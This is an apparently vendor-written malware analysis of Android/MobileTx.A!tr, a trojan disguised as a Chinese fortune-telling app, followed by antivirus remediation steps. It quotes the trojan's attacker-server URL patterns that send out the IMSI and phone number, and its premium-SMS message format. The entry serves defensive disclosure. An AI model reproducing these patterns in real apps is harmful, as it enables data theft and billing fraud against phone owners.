Android/MobileTx.A!tr

Analysis

Android/MobileTx.A!tr is a piece of malware targetting Android mobile phones.
The malicious package comes disguised as a Chinese fortune telling application however, leaks information from the victim's phone such as IMSI. It also sends out SMS messages to a premium rate number, hence causing losses for the user.

Technical Details

The malicious application comes in packages such as com.tx.pet The malicious package contains the following classes :

• MainActivity : It creates the application view and starts the task ValidateAsyncTask described below. Next, it checks if the TxActivity is running, every 12 secs, and if not, launches it.
• ValidateAsyncTask : It reads the phone's IMSI and registers the phone with the attacker's server by sending out a POST request to

  hxxp://[REMOVED].tx.com.cn:8081/client/xxx.xx

  with the IMSI as a parameter.
  In turn the server responds with a group of #-separated values that are reads as the uid, imsi and phonenumber, in that order.
  Next, it sends out an SMS message to the premium number 12114 with the contents

  "天下#99#" + imsi + "#android#sp_jifeng"

• TxActivity : This activity contacts the URL

  http://[REMOVED].tx.com.cn:8081/client/xxxx.xx?viewerId="+uid+"&imsi="+imsi+"&phonenum="+phonenum+"&type=15

  where the parameter variables are the value received in the previous request.

Recommended Action

FortiGate Systems

• Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
  FortiClient Systems
  
• Quarantine/delete files that are detected and replace infected files with clean backup copies.